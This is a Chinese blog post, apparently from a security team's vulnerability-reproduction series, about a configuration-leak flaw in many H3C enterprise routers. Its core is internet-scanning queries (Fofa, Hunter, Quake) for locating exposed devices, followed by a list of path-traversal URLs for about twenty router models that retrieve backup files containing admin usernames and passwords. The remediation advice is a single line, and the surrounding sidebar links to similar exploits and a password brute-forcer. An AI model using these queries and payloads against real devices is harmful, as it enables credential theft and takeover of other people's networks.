【漏洞复现】华三 H3C路由器 userLogin.asp 信息泄漏漏洞

最新推荐文章于 2024-08-06 10:20:28 发布
最新推荐文章于 2024-08-06 10:20:28 发布
阅读量1.5k 收藏 9
点赞数 5
分类专栏: 漏洞复现 文章标签: web 渗透测试 网络安全 信息安全 漏洞 漏洞复现 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/139730069
版权

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。

产品简介

        H3C路由器是一款高性能的路由器产品,具有稳定的性能和丰富的功能。它采用了先进的路由技术和安全机制,可以满足不同用户的需求,广泛应用于企业、运营商和数据中心等领域。

漏洞描述

        H3C路由器多系列存在信息泄露漏洞,攻击者可以利用该漏洞获取备份文件中的管理员账户及密码等敏感信息。

网络空间测绘

Fofa

app="H3C-Ent-Router"

Hunter

app.name="H3C Router Management"

Quake

app:"H3C华三-多款路由设备Web登陆"

image.png

漏洞复现

ER8300G2.cfg 要按照你的路由器型号填写

/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

image.png
image.png

修复建议

请关注厂商获取安全补丁:https://www.h3c.com/cn/



关注公众号,获取更多安全资讯:
在这里插入图片描述

凝聚力安全团队
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
泛微e-cology_getE9DevelopAllNameValue2任意文件读取漏洞
weixin_43567873的博客
03-28 373
泛微e-cology_getE9DevelopAllNameValue2任意文件读取漏洞
泛微E-Cology getE9DevelopAllNameValue2 任意文件读取漏洞复现
0xSec
01-29 1145
泛微E-Cology getE9DevelopAllNameValue2接口处任意文件读取漏洞,未经身份验证的攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
H3C路由器userLogin.asp信息泄漏漏洞-类型补充
最新发布
weixin_45100060的博客
08-06 253
华三家用路由器配置泄露
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 834
任务环境说明:服务器场景:Server1。
CVE-2024-32238 H3C-密码泄露
OrangeFox__111的博客
07-24 387
H3C ER8300G2-X易受不正确访问控制的影响。路由器管理系统的密码可以通过管理系统页面登录界面访问。app="H3C-Ent-Router" && title=="ER8300G2-X系统管理。返回包中存在有vtypasswd参数,告诉了我们登录的密码。修复建议:升级到最新版本。CVE-2024-32238 H3C-密码泄露漏洞复现
H3C ER G2系列路由器敏感信息泄露漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-20 2045
H3C ER2200G2是H3C推出的新一代高性能企业级路由器,采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。定位于以太网/光纤/xDSL接入的中小商业市场(SMB),可部署于需要高速Internet接入的政府机构、中小企业、餐饮连锁、酒店、学校、医院、网吧等网络环境。H3C ER G2系列版本存在敏感信息泄露漏洞。攻击者通过actionpolicy_status跳转别的接口,利用该漏洞访问ER2200G2.cfg文件。
关于H3C路由器漏洞的情况说明
weixin_44106034的博客
10-19 3023
ER3108G-CN,ER3108GW-CN,ER2100-CN,ER2100V2,ER2100n,ER2210C-CN,ER3100-CN,ER3260-CN,ER5100-CN,ER5200-CN,ER6300-CN,ER8300-CN,ER3200-CN已停止维护。H3C MC101/MC102/MC500/H100/H100-EI/H200/H200-EI、H3C X3路由器H3C Magic R1/R100/B1/B0/B3/M2都已经停止维护。
漏洞复现】泛微OA E-Cology ln.FileDownload 任意文件读取漏洞
凝聚力安全团队
06-18 560
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公解决方案。e-cology平台提供了一系列协同办公工具,包括在线办公应用、文档管理、任务管理、日程安排、电子邮件和即时通讯等。泛微OA ln.FileDownload 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件。。
(附nuclei yaml文件)H3C多款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)
nglj9527的博客
05-22 842
漏洞位于/userLogin.asp页面,通过访问路径/userLogin.asp/…/actionpolicy_status/…/设备型号.cfg,可获取设备配置文件,进而获得WEB管理账号及密码。
泛微-getE9DevelopAllNameValue2-任意文件读取漏洞-未公开Day漏洞复现
weixin_43167326的博客
01-21 687
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!是一款全面的企业协同办公平台,提供了丰富的功能模块,包括流程管理、文档管理、协作办公、移动办公等。它可以帮助企业实现信息共享、团队协作和业务流程的数字化转型,提高工作效率和合作效能。
H3C路由器 ER G2G3系列路由器.zip
02-28
目录 SOHO路由&&Mm无线常见问题...H3CERG3列路由器用户手册6W02正文Pdf H3CERG3系列路由器用户TA4Q602整本手册pdf H3CERG3系列路由器典型配置案集G00-整本手pdf H3CERHMG2&G3MIB companion.doc ER-ERG2系列产量培训pptx
信息安全等级保护测评实施H3C路由器二级作业指导书.doc
09-02
"H3C路由器信息安全等级保护测评实施指南" 本资源摘要信息涵盖了H3C路由器信息安全等级保护测评实施指南相关知识点,以下是详细的知识点说明: 一、结构安全与网段划分 * 网络设备的业务处理能力应具备冗余空间,...
H3C-MSR路由器升级指导.docx
08-13
"H3C-MSR路由器升级指导" 本指导手册旨在帮助用户升级H3C-MSR系列路由器,包括常规ctl升级、bootroom升级等方式。升级包应提前下载好,本地电脑配置tftp或ftp。 一、启动文件简介 启动文件用于引导设备启动的程序...
h3c 华三路由器 RC3000 编程器备份固件
10-07
h3c 华三路由器 RC3000 编程器备份固件 使用编程器备份出来的固件。直接写入就用使用。 W25N01GW
暴力破解H3C管理员.py
10-03
暴力破解H3C管理员弱密码,仅供测试学习使用
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 812
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
用友 U8+CRM V13-V16.5 任意文件读取漏洞
WuYSec的博客
06-14 558
用友U8 CRM 客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。用友U8 CRM 客户关系管理系统存在任意文件读取漏洞。无垠Sec专注安全研究,包括但不限于代码审计、漏洞挖掘、思路分享等。目前仅需50,你就能得到常见系统1day漏洞POC、代码审计、漏洞分析、漏洞挖掘等。此漏洞影响 V16.5, V16.1, V16.0, V15.1, V15.0, V13版本。app="用友-U8CRM" || title="用友U8CRM"
大华智慧园区综合管理平台任意密码读取漏洞复现
08-14 2224
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
华三h3c路由器配置命令
09-16
华三H3C路由器的配置命令包括: - 完成路由器的基本配置:名称、远程登陆密码、控制台密码、系统运行配置、系统时间、删除文件等、配置激活路由器接口。 - 使用root用户登录:login,然后输入用户名和密码。 - 显示路由器配置信息:display current-configuration。 - 关闭路由器:shutdown -h now或init 0。 - 用户注销:logout。 - 新建用户:user local-user。 - 返回上级视图:return。 - 退回到系统视图:end。 - 显示接口状态:display interface。 - 显示路由表:display ip routing-table。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值